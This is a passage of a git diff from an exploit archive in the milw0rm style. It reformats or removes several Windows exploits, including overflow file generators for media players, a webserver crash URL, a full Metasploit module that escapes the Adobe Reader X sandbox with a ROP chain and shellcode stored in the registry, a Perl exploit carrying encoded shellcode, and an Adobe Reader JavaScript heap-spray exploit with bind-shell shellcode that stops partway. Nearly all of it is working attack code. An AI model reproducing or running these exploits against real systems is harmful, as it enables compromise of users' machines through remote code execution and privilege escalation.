3\n" . +"0000000000 65535 f \n" . +"0000009988 00000 n \n" . +"0000010039 00000 n \n" . +"trailer\n" . +"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" . +"startxref\n" . +"104\n" . +"%%EOF\n"; + +} + +# milw0rm.com [2009-02-23] diff --git a/platforms/windows/dos/8232.py b/platforms/windows/dos/8232.py index c9204be69..37105694a 100755 --- a/platforms/windows/dos/8232.py +++ b/platforms/windows/dos/8232.py @@ -1,20 +1,20 @@ -#!/usr/bin/python -# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC -# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!! -# I have tried a lot of Addresses . -# Waitting for the Exploit from someone . -# Download : http://www.jpcha2.com/setup/chasys_media_player.zip -print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC" -print " Discovered By : zAx" -print " Contact : ThE-zAx@Hotmail.Com" -header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" -junk = "\x41"*2024 -next_seh = "\x42"*4 -seh = "\x43"*4 -other_data = "\xCC"*800 -ex = header + junk + next_seh + seh + other_data -file=open("zAx.pls","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-03-18] +#!/usr/bin/python +# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC +# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!! +# I have tried a lot of Addresses . +# Waitting for the Exploit from someone . +# Download : http://www.jpcha2.com/setup/chasys_media_player.zip +print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC" +print " Discovered By : zAx" +print " Contact : ThE-zAx@Hotmail.Com" +header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" +junk = "\x41"*2024 +next_seh = "\x42"*4 +seh = "\x43"*4 +other_data = "\xCC"*800 +ex = header + junk + next_seh + seh + other_data +file=open("zAx.pls","w") +file.write(ex) +file.close() + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/dos/8356.txt b/platforms/windows/dos/8356.txt index 7f50c8dd3..9da933e8f 100755 --- a/platforms/windows/dos/8356.txt +++ b/platforms/windows/dos/8356.txt @@ -1,43 +1,43 @@ -------------- -by DATA_SNIPER -GREETZ TO THE FOUNDER ;) -fore more information and bug analyses: -http://www.at4re.com/f/showthread.php?p=47560 -i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] -so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit. -and the second code change the EAX to 017ED9A0. -xslt.xsl code EAX=00000031: -<?xml version="1.0" encoding="UTF-8"?> - -http://www.w3.org/1999/XSL/Transform"> - - <xsl:key name="label" match="item1" use=""/> - - <xsl:template match="root"> - <xsl:for-each select="key('label', @item1)"> - </xsl:for-each> - </xsl:template> - -</xsl:stylesheet> -xslt.xsl code EAX=017ED9A0: -<?xml version="1.0" encoding="UTF-8"?> - -http://www.w3.org/1999/XSL/Transform"> - - <xsl:key name="label" match="item1" use=""/> - - <xsl:template match="root"> - <xsl:value-of select="key('label', @item1)"> - </xsl:value-of> - </xsl:template> -</xsl:stylesheet> - -xmlcrash.xml code: - -<?xml version="1.0" encoding="UTF-8"?> -<?xml-stylesheet type="text/xsl" href="xslt.xsl"?> -http://www.w3.org/2001/XMLSchema-instance"> - <item1 id="datasniper" /> -</root> - -# milw0rm.com [2009-04-06] +------------- +by DATA_SNIPER +GREETZ TO THE FOUNDER ;) +fore more information and bug analyses: +http://www.at4re.com/f/showthread.php?p=47560 +i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] +so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit. +and the second code change the EAX to 017ED9A0. +xslt.xsl code EAX=00000031: +<?xml version="1.0" encoding="UTF-8"?> + +http://www.w3.org/1999/XSL/Transform"> + + <xsl:key name="label" match="item1" use=""/> + + <xsl:template match="root"> + <xsl:for-each select="key('label', @item1)"> + </xsl:for-each> + </xsl:template> + +</xsl:stylesheet> +xslt.xsl code EAX=017ED9A0: +<?xml version="1.0" encoding="UTF-8"?> + +http://www.w3.org/1999/XSL/Transform"> + + <xsl:key name="label" match="item1" use=""/> + + <xsl:template match="root"> + <xsl:value-of select="key('label', @item1)"> + </xsl:value-of> + </xsl:template> +</xsl:stylesheet> + +xmlcrash.xml code: + +<?xml version="1.0" encoding="UTF-8"?> +<?xml-stylesheet type="text/xsl" href="xslt.xsl"?> +http://www.w3.org/2001/XMLSchema-instance"> + <item1 id="datasniper" /> +</root> + +# milw0rm.com [2009-04-06] diff --git a/platforms/windows/dos/8588.pl b/platforms/windows/dos/8588.pl index 8e0e95eec..1ceedbec4 100755 --- a/platforms/windows/dos/8588.pl +++ b/platforms/windows/dos/8588.pl @@ -1,23 +1,23 @@ -##################################################################################################### -# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC -# Discovered by SirGod - www.mortal-team.net -# Error log : -# -# Logged at Friday, May 01, 2009 14:03:17 -# FileVersion: 1.0.0.283 -# ProductVersion: 1.0.0.0 -# Exception Code: 0xC0000005 -# Exception Addr: 0x001B:0x004317F0 -# Exception Module: TraktorBeatport.exe -# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC -# The memory could not be "read" -# http://www.brothersoft.com/beatport-player-download-62319.html -###################################################################################################### -my $chars= "A" x 1337; -my $file="sirgod.m3u"; -open(my $FILE, ">>$file") or die "Cannot open $file: $!"; -print $FILE $chars; -close($FILE); -print "$file was created"; - -# milw0rm.com [2009-05-01] +##################################################################################################### +# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC +# Discovered by SirGod - www.mortal-team.net +# Error log : +# +# Logged at Friday, May 01, 2009 14:03:17 +# FileVersion: 1.0.0.283 +# ProductVersion: 1.0.0.0 +# Exception Code: 0xC0000005 +# Exception Addr: 0x001B:0x004317F0 +# Exception Module: TraktorBeatport.exe +# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC +# The memory could not be "read" +# http://www.brothersoft.com/beatport-player-download-62319.html +###################################################################################################### +my $chars= "A" x 1337; +my $file="sirgod.m3u"; +open(my $FILE, ">>$file") or die "Cannot open $file: $!"; +print $FILE $chars; +close($FILE); +print "$file was created"; + +# milw0rm.com [2009-05-01] diff --git a/platforms/windows/dos/9621.txt b/platforms/windows/dos/9621.txt index 690f86f4b..ee85ffb46 100755 --- a/platforms/windows/dos/9621.txt +++ b/platforms/windows/dos/9621.txt @@ -1,34 +1,34 @@ -############################################################################################# -# -# Name : Kolibri+ Webserver 2 , Denial Of service / Crash -# Author : Usman Saeed -# Company : Xc0re Security Reasearch Group -# Date : 06/09/09 -# Homepage : http://www.xc0re.net -# -############################################################################################# - - -[*] Download Page : -http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol - - -[*] Attack type : Remote - - -[*] Patch Status : Unpatched - - - -[*] Exploitation : - - - -[+] [Denial Of Service / CRASH] - -("A" x 200; #Late crash) - -Exploit: -http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - -# milw0rm.com [2009-09-10] +############################################################################################# +# +# Name : Kolibri+ Webserver 2 , Denial Of service / Crash +# Author : Usman Saeed +# Company : Xc0re Security Reasearch Group +# Date : 06/09/09 +# Homepage : http://www.xc0re.net +# +############################################################################################# + + +[*] Download Page : +http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol + + +[*] Attack type : Remote + + +[*] Patch Status : Unpatched + + + +[*] Exploitation : + + + +[+] [Denial Of Service / CRASH] + +("A" x 200; #Late crash) + +Exploit: +http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +# milw0rm.com [2009-09-10] diff --git a/platforms/windows/local/25776.rb b/platforms/windows/local/25776.rb deleted file mode 100755 index cad5c3c7e..000000000 --- a/platforms/windows/local/25776.rb +++ /dev/null @@ -1,358 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex' -require 'msf/core/post/windows/registry' -require 'msf/core/post/common' -require 'msf/core/post/file' - -class Metasploit3 < Msf::Exploit::Local - Rank = GreatRanking - - include Msf::Exploit::EXE - include Msf::Post::Common - include Msf::Post::File - include Msf::Post::Windows::Registry - - def initialize(info={}) - super(update_info(info, { - 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', - 'Description' => %q{ - This module exploits a vulnerability on Adobe Reader X Sandbox. The - vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe - process to write register values which can be used to trigger a buffer overflow on - the AdobeCollabSync component, allowing to achieve Medium Integrity Level - privileges from a Low Integrity AcroRd32.exe process. This module has been tested - successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Felipe Andres Manzano', # Vulnerability discovery and PoC - 'juan vazquez' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2013-2730' ], - [ 'OSVDB', '93355' ], - [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] - ], - 'Arch' => ARCH_X86, - 'Platform' => 'win', - 'SessionTypes' => 'meterpreter', - 'Payload' => - { - 'Space' => 12288, - 'DisableNops' => true - }, - 'Targets' => - [ - [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', - { - 'AdobeCollabSyncTrigger' => 0x18fa0, - 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" - } - ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate'=> 'May 14 2013' - })) - - end - - def on_new_session - print_status("Deleting Malicious Registry Keys...") - if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") - print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") - end - if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") - print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") - end - print_status("Cleanup finished") - end - - # Test the process integrity level by trying to create a directory on the TEMP folder - # Access should be granted with Medium Integrity Level - # Access should be denied with Low Integrity Level - # Usint this solution atm because I'm experiencing problems with railgun when trying - # use GetTokenInformation - def low_integrity_level? - tmp_dir = expand_path("%TEMP%") - cd(tmp_dir) - new_dir = "#{rand_text_alpha(5)}" - begin - session.shell_command_token("mkdir #{new_dir}") - rescue - return true - end - - if directory?(new_dir) - session.shell_command_token("rmdir #{new_dir}") - return false - else - return true - end - end - - def check_trigger - signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) - if signature == target['AdobeCollabSyncTriggerSignature'] - return true - end - return false - end - - def collect_addresses - # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe - @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] - vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") - - # find kernel32.dll - kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") - @addresses['kernel32.dll'] = kernel32["return"] - if @addresses['kernel32.dll'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") - end - vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") - - # find kernel32.dll methods - virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") - @addresses['VirtualAlloc'] = virtual_alloc["return"] - if @addresses['VirtualAlloc'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") - end - vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") - - reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") - @addresses['RegGetValueA'] = reg_get_value["return"] - if @addresses['RegGetValueA'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") - end - vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") - - # find ntdll.dll - ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll") - @addresses['ntdll.dll'] = ntdll["return"] - if @addresses['ntdll.dll'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") - end - vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") - end - - # Search a gadget identified by pattern on the process memory - def search_gadget(base, offset_start, offset_end, pattern) - mem = base + offset_start - length = offset_end - offset_start - mem_contents = session.railgun.memread(mem, length) - return mem_contents.index(pattern) - end - - # Search for gadgets on ntdll.dll - def search_gadgets - ntdll_text_base = 0x10000 - search_length = 0xd6000 - - @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") - if @gadgets['mov [edi], ecx # ret'].nil? - fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") - end - @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] - @gadgets['mov [edi], ecx # ret'] += ntdll_text_base - vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") - - @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 - vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") - - @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") - if @gadgets['pop edi # ret'].nil? - fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") - end - @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] - @gadgets['pop edi # ret'] += ntdll_text_base - vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") - - @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") - if @gadgets['pop ecx # ret'].nil? - fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") - end - @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] - @gadgets['pop ecx # ret'] += ntdll_text_base - vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") - end - - def store(buf, data, address) - i = 0 - while (i < data.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [address + i].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << data[i, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - i = i + 4 - end - return i - end - - def create_rop_chain - mem = 0x0c0c0c0c - - buf = [0x58000000 + 1].pack("V") - buf << [0x58000000 + 2].pack("V") - buf << [0].pack("V") - buf << [0x58000000 + 4].pack("V") - - buf << [0x58000000 + 5].pack("V") - buf << [0x58000000 + 6].pack("V") - buf << [0x58000000 + 7].pack("V") - buf << [@gadgets['ret']].pack("V") - buf << rand_text(8) - - # Allocate Memory To store the shellcode and the necessary data to read the - # shellcode stored in the registry - buf << [@addresses['VirtualAlloc']].pack("V") - buf << [@gadgets['ret']].pack("V") - buf << [mem].pack("V") # lpAddress - buf << [0x00010000].pack("V") # SIZE_T dwSize - buf << [0x00003000].pack("V") # DWORD flAllocationType - buf << [0x00000040].pack("V") # flProtect - - # Put in the allocated memory the necessary data in order to read the - # shellcode stored in the registry - # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions - reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" - reg_key_length = store(buf, reg_key, mem) - # 2) The reg entry: shellcode - value_key = "shellcode\x00" - store(buf, value_key, mem + reg_key_length) - # 3) The output buffer size: 0x3000 - size_buffer = 0x3000 - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + 0x50].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << [size_buffer].pack("V") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - - # Copy the shellcode from the the registry to the - # memory allocated with executable permissions and - # ret into there - buf << [@addresses['RegGetValueA']].pack("V") - buf << [mem + 0x1000].pack("V") # ret to shellcode - buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER - buf << [mem].pack("V") # lpSubKey - buf << [mem + 0x3c].pack("V") # lpValue - buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY - buf << [0].pack("V") # pdwType - buf << [mem + 0x1000].pack("V") # pvData - buf << [mem + 0x50].pack("V") # pcbData - end - - # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry - def store_data_registry(buf) - vprint_status("Creating the Registry Key to store the shellcode...") - - if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") - vprint_good("Registry Key created") - else - fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") - end - - vprint_status("Storing the shellcode in the Registry...") - - if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") - vprint_good("Shellcode stored") - else - fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") - end - - # Create the Malicious registry entry in order to exploit.... - vprint_status("Creating the Registry Key to trigger the Overflow...") - if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") - vprint_good("Registry Key created") - else - fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") - end - - vprint_status("Storing the trigger in the Registry...") - if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") - vprint_good("Trigger stored") - else - fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") - end - end - - def trigger_overflow - vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") - # Create a thread in order to execute the necessary code to launch AdobeCollabSync - ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) - if ret['return'] < 1 - print_error("Unable to CreateThread") - return - end - hthread = ret['return'] - - vprint_status("Resuming the Thread...") - # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! - ret = client.railgun.kernel32.ResumeThread(hthread) - if ret['return'] < 1 - fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") - end - end - - def check - @addresses = {} - acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") - @addresses['AcroRd32.exe'] = acrord32["return"] - if @addresses['AcroRd32.exe'] == 0 - return Msf::Exploit::CheckCode::Unknown - elsif check_trigger - return Msf::Exploit::CheckCode::Vulnerable - else - return Msf::Exploit::CheckCode::Detected - end - end - - def exploit - @addresses = {} - @gadgets = {} - - print_status("Verifying we're in the correct target process...") - acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") - @addresses['AcroRd32.exe'] = acrord32["return"] - if @addresses['AcroRd32.exe'] == 0 - fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") - end - vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") - - print_status("Checking the AcroRd32.exe image...") - if not check_trigger - fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") - end - - print_status("Checking the Process Integrity Level...") - if not low_integrity_level? - fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") - end - - print_status("Collecting necessary addresses for exploit...") - collect_addresses - - print_status("Searching the gadgets needed to build the ROP chain...") - search_gadgets - print_good("Gadgets collected...") - - print_status("Building the ROP chain...") - buf = create_rop_chain - print_good("ROP chain ready...") - - print_status("Storing the shellcode and the trigger in the Registry...") - store_data_registry(buf) - - print_status("Executing AdobeCollabSync.exe...") - trigger_overflow - end -end diff --git a/platforms/windows/local/6157.pl b/platforms/windows/local/6157.pl index 25ed6a753..6ab6a90d4 100755 --- a/platforms/windows/local/6157.pl +++ b/platforms/windows/local/6157.pl @@ -1,27 +1,27 @@ -#!/usr/bin/perl -# k`sOSe - 07/29/2008 - -use warnings; -use strict; - -# http://www.metasploit.com -# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe -# [*] x86/shikata_ga_nai succeeded, final size 169 -my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" . - "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" . - "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" . - "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" . - "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" . - "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" . - "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" . - "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" . - "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" . - "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . - "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" . - "\x1e\x28\x44\xd4"; - -print $shellcode . - "\x41" x (218 - length($shellcode)) . - "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3 - -# milw0rm.com [2008-07-29] +#!/usr/bin/perl +# k`sOSe - 07/29/2008 + +use warnings; +use strict; + +# http://www.metasploit.com +# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe +# [*] x86/shikata_ga_nai succeeded, final size 169 +my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" . + "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" . + "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" . + "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" . + "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" . + "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" . + "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" . + "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" . + "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" . + "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . + "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" . + "\x1e\x28\x44\xd4"; + +print $shellcode . + "\x41" x (218 - length($shellcode)) . + "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3 + +# milw0rm.com [2008-07-29] diff --git a/platforms/windows/local/7006.txt b/platforms/windows/local/7006.txt index 66b21d885..f5995606c 100755 --- a/platforms/windows/local/7006.txt +++ b/platforms/windows/local/7006.txt @@ -1,43 +1,43 @@ -Adobe Reader Javascript Printf Buffer Overflow Exploit -=========================================================== -Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow -CVE-2008-2992 - -Thanks to coresecurity for the technical background. - -6Nov,2008: Exploit released by me - -Credits: Debasis Mohanty -www.hackingspirits.com -www.coffeeandsecurity.com -=========================================================== - -//Exploit by Debasis Mohanty (aka nopsledge/Tr0y) -//www.coffeeandsecurity -//www.hackingspirits.com - - -// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com - -var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"); - -//Heap Spray starts here - Kiddos don't mess up with this -var nop =""; -for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090"); -heapblock = nop + payload; -bigblock = unescape("%u9090%u9090"); -headersize = 20; -spray = headersize+heapblock.length -while (bigblock.length<spray) bigblock+=bigblock; -fillblock = bigblock.substring(0, spray); -block = bigblock.substring(0, bigblock.length-spray); -while(block.length+spray < 0x40000) block = block+block+fillblock; -mem = new Array(); -for (i=0;i<1400;i++) mem[i] = block + heapblock; - -// reference snippet from core security -// http://www.coresecurity.com/content/adobe-reader-buffer-overflow -var num = 